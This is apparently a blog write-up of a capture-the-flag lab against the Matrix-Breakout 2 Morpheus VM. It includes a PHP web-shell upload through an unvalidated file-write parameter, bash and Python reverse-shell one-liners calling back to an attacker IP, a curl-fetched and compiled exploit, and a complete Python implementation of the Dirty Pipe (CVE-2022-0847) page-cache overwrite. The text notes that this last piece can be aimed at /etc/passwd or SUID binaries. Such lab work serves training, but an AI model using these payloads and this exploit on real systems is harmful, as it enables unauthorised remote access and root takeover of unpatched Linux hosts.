Fading Coder

One Final Commit for the Last Sprint


Exploiting Arbitrary File Write and Dirty Pipe in Matrix-Breakout 2 Morpheus


Deploy the target OVA in VirtualBox and configure the attacker environment using Kali Linux on the same internal network segment. After booting, identify the target's assigned IP through network scanning:

arp-scan -l

Once the target is identified (e.g., 10.0.2.15), perform aggressive service enumeration:

nmap -sC -sV -p- -T4 10.0.2.15

The scan reveals HTTP services on standard ports. Manual inspection of the web root shows minimal functionality. Proceed with directory brute-forcing to uncover hidden endpoints:

gobuster dir -u http://10.0.2.15 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak,zip

This discovers robots.txt, wall.php, and messages.txt. The wall.php endpoint implements a graffiti-style message board that appends user input to a text file. Intercept the submission request with a proxy to analyze its parameters: besides the message body it carries a target_file parameter that names the output file. Nothing validates that name, so the endpoint is an arbitrary file write as the web server user, and any path that user can write to, including the document root, is reachable.

Craft a request to deploy a PHP web shell (when you edit the body in a proxy, let it recompute Content-Length):

POST /wall.php HTTP/1.1
Host: 10.0.2.15
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

input_data=<?php echo shell_exec($_REQUEST['c']); ?>&target_file=cmd.php

Verify execution by accessing http://10.0.2.15/cmd.php?c=whoami ($_REQUEST accepts the command via GET or POST). To establish an interactive session, set up a listener on the attacker machine:

nc -lvnp 9999

Inject a reverse shell payload through the deployed web shell. shell_exec() hands the command to /bin/sh, which on Debian and Ubuntu targets is dash and does not support the /dev/tcp pseudo-device (a bare bash one-liner fails with "Bad fd number"), so wrap it in an explicit bash -c. URL-encode the result before sending it, since the &, > and / characters would otherwise be interpreted as query-string syntax:

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.2.10/9999 0>&1'

Or utilize a Python alternative:

python3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('10.0.2.10',9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"

Once the reverse connection is established, stabilize the shell and enumerate the file system. In the web directory, locate a hidden PNG file (e.g., .neo-secret.png). Because it sits under the document root it can be fetched over HTTP; download it to the attacker machine for local analysis:

wget http://10.0.2.15/.neo-secret.png

Analyze for steganography or embedded archives:

binwalk -e .neo-secret.png

Extracted data reveals compressed content containing credential hints or intermediate flags. Continue enumeration to identify privilege escalation vectors. Check the kernel version:

uname -a

Kernels from Linux 5.8 up to, but not including, the fixed releases 5.16.11, 5.15.25 and 5.10.102 are susceptible to the Dirty Pipe vulnerability (CVE-2022-0847); the 5.11 to 5.14 series were already end-of-life and never received the fix, and 5.17 shipped fixed. Distribution kernels backport fixes without changing the upstream version string, so treat the uname output as a hint and confirm with the exploit against a throwaway file you own. Transfer the exploit to the target (if gcc is missing there, build it with -static on the attacker machine for the target's architecture and transfer the binary instead):

# Attacker host
python3 -m http.server 8888

# Target shell
curl http://10.0.2.10:8888/pipe-exploit.c -o /tmp/exp.c
gcc /tmp/exp.c -o /tmp/pwn -static
chmod +x /tmp/pwn
/tmp/pwn

Alternatively, if using a prepared exploit script or a statically compiled binary:

chmod +x privesc.sh
./privesc.sh

The exploit leverages a flaw in pipe page splicing: splice() handed page-cache pages to a pipe without clearing the pipe buffer's flags, so a stale PIPE_BUF_FLAG_CAN_MERGE flag lets a subsequent write() into the pipe be merged straight into the page cache of a file the attacker can only read. Public exploits use this either to rewrite /etc/passwd (adding a passwordless root entry) or to patch a SUID binary such as /usr/bin/su with a small ELF that spawns a root shell. The page is never marked dirty, so the change lives only in the page cache and is lost on eviction or reboot, which is why most exploits restore the original bytes once root is obtained. Successful execution yields root privileges. Retrieve the final flag:

cat /root/root.txt
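Two things a practitioner wants at this step: a version check that encodes the fixed releases correctly, and the write primitive itself in a form that can be tried against a harmless file before touching /etc/passwd or a SUID binary. The following is an added Python example, not the pipe-exploit.c or privesc.sh used above; the primitive reproduces the public proof-of-concept sequence (fill the pipe, drain it, splice one byte of the target file into it, write the payload) using os.splice, so it needs Python 3.10 or later on Linux. The probe file path in the main block is an assumption for a lab run.

```python
"""CVE-2022-0847 (Dirty Pipe): kernel-version triage and the write
primitive.  Added example, not the walkthrough's pipe-exploit.c; the
primitive reproduces the public proof-of-concept sequence (fill the pipe,
drain it, splice one byte of the target file, write the payload) with
os.splice, so it needs Python 3.10+ on Linux.  The probe file in __main__
is an assumption for a lab run; the same function works on /etc/passwd or a
SUID binary on an unpatched kernel."""
import fcntl
import os
import re

PAGE_SIZE = os.sysconf("SC_PAGE_SIZE")

# Bug introduced in 5.8.  Stable branches that shipped the fix and their
# first fixed release; 5.11-5.14 were end-of-life and never received it,
# 5.17 and later were fixed before release.
INTRODUCED = (5, 8)
FIRST_FIXED = {(5, 10): (5, 10, 102), (5, 15): (5, 15, 25), (5, 16): (5, 16, 11)}
FIXED_MAINLINE = (5, 17)


def parse_release(release: str) -> tuple:
    """'5.13.0-30-generic' -> (5, 13, 0).  Only the upstream numbers are used."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release {release!r}")
    return tuple(int(x or 0) for x in m.groups())


def is_vulnerable(release: str) -> bool:
    """Upstream-version triage only: distribution kernels backport fixes
    without bumping the version, so treat True as a hint and confirm with
    the primitive against a file you own."""
    v = parse_release(release)
    if v[:2] < INTRODUCED or v[:2] >= FIXED_MAINLINE:
        return False
    fixed = FIRST_FIXED.get(v[:2])
    return fixed is None or v < fixed


def overwrite_is_feasible(offset: int, data: bytes) -> bool:
    """Constraints of the primitive: one byte before the payload must be
    spliced from the same page, and the payload may not cross a page boundary."""
    if offset <= 0 or offset % PAGE_SIZE == 0:
        return False
    return 0 < len(data) <= PAGE_SIZE - offset % PAGE_SIZE


def dirty_pipe_overwrite(path: str, offset: int, data: bytes) -> None:
    """Write data into the page cache of a file opened read-only."""
    if not overwrite_is_feasible(offset, data):
        raise ValueError("offset/payload violate the page-boundary constraints")
    if offset + len(data) > os.stat(path).st_size:
        raise ValueError("the primitive cannot grow the file")
    fd = os.open(path, os.O_RDONLY)      # read permission is all we need
    r, w = os.pipe()
    try:
        size = fcntl.fcntl(w, fcntl.F_GETPIPE_SZ)
        # Fill every slot of the pipe ring, then drain it: the data is gone
        # but each pipe_buffer keeps PIPE_BUF_FLAG_CAN_MERGE set.
        filler = b"\0" * size
        done = 0
        while done < size:
            done += os.write(w, filler[done:])
        done = 0
        while done < size:
            done += len(os.read(r, size - done))
        # splice() now hands the pipe a reference to the file's page-cache
        # page; an unpatched kernel leaves the stale CAN_MERGE flag in place...
        if os.splice(fd, w, 1, offset_src=offset - 1) != 1:
            raise OSError("splice returned short")
        # ...so this write is merged straight into the page-cache page.
        if os.write(w, data) != len(data):
            raise OSError("short write into pipe")
    finally:
        os.close(fd)
        os.close(r)
        os.close(w)


if __name__ == "__main__":
    release = os.uname().release
    print(f"{release}: version check says {'vulnerable' if is_vulnerable(release) else 'fixed'}")
    # Assumed lab probe: a scratch file we own, so the outcome is a clean
    # yes/no without touching system files.
    probe = "/tmp/dirtypipe-probe.txt"
    with open(probe, "w") as f:
        f.write("A" * 64)
    dirty_pipe_overwrite(probe, 1, b"DIRTY")
    with open(probe) as f:
        hit = f.read().startswith("ADIRTY")
    print("page cache modified (kernel vulnerable):", hit)
```

On a patched kernel the write into the pipe succeeds but the file reads back unchanged; on a vulnerable one the probe shows the overwritten bytes even though nothing was written to disk. The same call with /etc/passwd and an offset inside the root entry is what the published exploits do.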
